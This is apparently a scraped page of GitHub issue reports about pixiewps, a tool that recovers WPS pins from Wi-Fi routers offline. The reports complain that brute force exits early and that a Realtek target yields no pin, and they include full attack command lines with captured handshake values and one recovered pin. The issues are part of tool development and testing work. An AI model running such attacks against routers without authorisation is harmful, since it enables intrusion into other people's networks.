cd:6e:66:1d:3d:fc:da:27:a4:de:54:0d:94:23:b3:fe:79:61:b1:4c:0e:14:f6:bf:54:a6:f7:ff:9f:13:b6:8b -z 9b:d3:67:d2:85:64:dc:e4:a2:11:35:3e:2a:89:12:50:a1:0a:cc:b8:b1:ff:e9:17:63:5f:23:43:92:ad:c8:bd -a 24:ec:5b:9d:e3:4a:6a:b4:b8:0c:35:5b:92:11:36:df:c6:37:bd:e5:e0:e6:c9:6d:ba:6f:75:fc:39:79:cd:3b -n 72:dc:de:b6:67:b1:81:93:5e:5b:53:22:02:b7:ee:26

 Pixiewps 1.1

 [*] E-S1:       20:95:ff:8f:1c:25:7f:45:44:d2:5c:03:6b:86:b8:c5
 [*] E-S2:       20:95:ff:8f:1c:25:7f:45:44:d2:5c:03:6b:86:b8:c5
 [+] WPS pin:    29821761

 [*] Time taken: 1 s

Please, fix this bug.
Thank you!

PRNG brute force exits immediately

I cannot figure out if this is the expected functionality or there's something wrong with my pixiewps which does not seem to attempt brute force at all. It exists immediately even though it says it could take 30 mins.

[+] Running pixiewps with the information, wait ...
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 59 ms
[Pixie-Dust]  
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]

No brute force seed vs a realtek chipset with comon realtek PKE

I wanted to try with old version but i have a fail compiling
So I could try with last commit and first of 2.2
This is the stdout of the attack with the data set

pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d4:c2:a0:98:37:1a:c7:07:d2:4e:fd:bc:d7:f1:97:27:15:1b:29:53:a6:d8:37:34:9d:10:29:79:43:c8:f1:e2:6c:e2:92:d5:0f:2a:60:2e:f7:21:bf:f7:cd:63:13:65:c3:d3:15:9b:a1:ef:5e:61:fd:ef:7b:ab:e7:d3:fe:dc:11:2a:03:8f:cc:f2:85:6e:cd:5c:96:ab:32:af:5e:2a:f2:bc:a5:0f:bb:12:30:12:f3:f5:3e:e1:6a:fc:62:35:f1:ec:bd:14:c3:7b:5e:8c:09:83:b6:75:c0:6c:2f:c6:e7:0a:c9:c7:fb:01:ab:e0:a1:a0:42:8c:78:d9:b4:28:9f:8c:de:db:57:c6:b2:4b:13:56:e0:dd:fe:4f:05:4c:89:d1:0a:04:59:fa:54:9f:d1:b2:8a:32:0d:0e:a9:ce:66:37:93:3f:a7:fa:74:8c:70:a2:b0:cf:10:c7:f8:22:0b:76:5b:29:72:31:b0:6c:30:32:95:ea:81:b7:17:96 -s 40:24:bb:f7:a5:c0:23:89:ec:a4:10:80:14:39:3c:3d:c9:63:2e:02:61:d0:2b:79:a7:13:ea:e9:bf:87:7e:42 -z 8f:ed:5f:27:c5:0d:60:6f:05:25:71:4d:23:d8:ff:4b:20:9f:3a:89:4b:3b:42:d5:88:12:b6:de:95:79:f6:f3 -a d2:0e:b0:7f:a2:72:de:63:6e:57:5c:5e:93:3f:2e:8d:e3:ce:70:dc:2c:df:e0:08:3e:1e:39:2f:8f:21:ad:ee -n ca:00:65:3b:e5:1a:0b:60:8c:85:a1:4e:a5:88:91:3b --mode 3

 Pixiewps 1.2

 [-] WPS pin not found!

 [*] Time taken: 0 s 172 ms

Shouldn't it start automatically the brute force seed when this PKE is detected?
The PA is not at my place but i will be able to check it again soon as i have to visit the people that have it.
Cheers

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.